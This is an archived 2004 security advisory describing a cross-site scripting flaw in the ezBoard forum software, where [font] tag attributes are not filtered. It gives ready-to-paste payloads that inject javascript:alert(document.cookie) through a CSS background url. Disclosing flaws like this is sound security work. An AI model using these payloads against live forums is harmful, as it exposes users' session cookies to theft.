TUCoPS :: Web BBS :: etc :: hack3697.htm

ezBoard Cross Site Scripting vuln
ezBoard Cross Site Scripting Vulnerability 



########################################################



Advisory Name:ezBoard Cross Site Scripting Vulnerability 

Release Date: Feb 24,2004 

Application: ezBoard 

Version Affected: 7.3u or lower?

Vendor URL: http://www.ezboard.com/ 

Discover: Cheng Peng Su(apple_soup_at_msn.com) 



########################################################



Proof of Concept:

      This vuln is from [font],ezBoard doesn't filter illegal characters ,such as ';()

      

       [font color=red;background:url(javascript:{XSS code})]hey[/font] will show

       hey

       

       and 

       

        [font face=Verdana;background:url(javascript:{XSS code})]hey[/font] will show

       hey

       



Exploit:

        [font color=red;background:url(javascript:alert(document.cookie))]Big Exploit![/font]

        [font face=Verdana;background:url(javascript:alert(document.cookie))]Big Exploit![/font]

         

         

Contact:

Cheng Peng Su

apple_soup_at_msn.com

Class 1,Senior 2,High school attached to Wuhan University

Wuhan,Hubei,China

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH